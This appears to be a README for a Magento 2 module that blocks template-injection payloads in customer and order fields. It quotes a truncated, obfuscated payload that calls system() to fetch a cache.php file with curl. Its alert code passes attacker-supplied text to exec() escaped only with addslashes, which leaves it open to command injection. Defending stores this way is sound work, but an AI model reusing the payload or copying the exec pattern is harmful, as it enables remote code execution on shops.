Disallow random code injection in Magento 2 trough API or WEB requests for: Order Creation, Customer Creation, Customer Name Update, Customer Address Update and fake orders wtih first and last name like:
{{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS....
Implemented a limit of 30 characters only for the firstname and lastname fields.
Characters like - {, }, <, >, % will be rejected from every field. Update or remove them if necessery:
if (preg_match('/[{}<>%]/', $input)) {
Email notifications for each unsuccessful attempt. Set your email in these 4 files: AddressSavePlugin.php, CreateAccountPlugin.php, CustomerSavePlugin.php, OrderSourceLogger.php
and ensure that mailx is installed and configured correctly on your server.
If you don't want to receive notifications -> comment:
$command = 'echo "' . addslashes($message) . '" | mailx -s "Unsuccessful attempt" your@email.com';
exec($command, $output, $returnVar);
if ($returnVar !== 0) {
throw new \Exception("Failed to send email. Command output: " . implode("\n", $output));
}
All requests will be saved here: '/magento/var/log/custom_order.log'; and send via email:
Unsuccessful order attempt:
Error Message: Invalid characters in First Name.
IP: X.X.X.X, 127.0.0.1
User Agent: Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36
Request URI: /rest/default/V1/guest-carts/6DxbMhXoXtUDcOrpOU2EMqOmGzITsEIy/payment-information
Unsuccessful attempt:
Error Message: Invalid characters in Postcode.
IP: X.X.X.X, 127.0.0.1
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Request URI: /customer/account/editPost/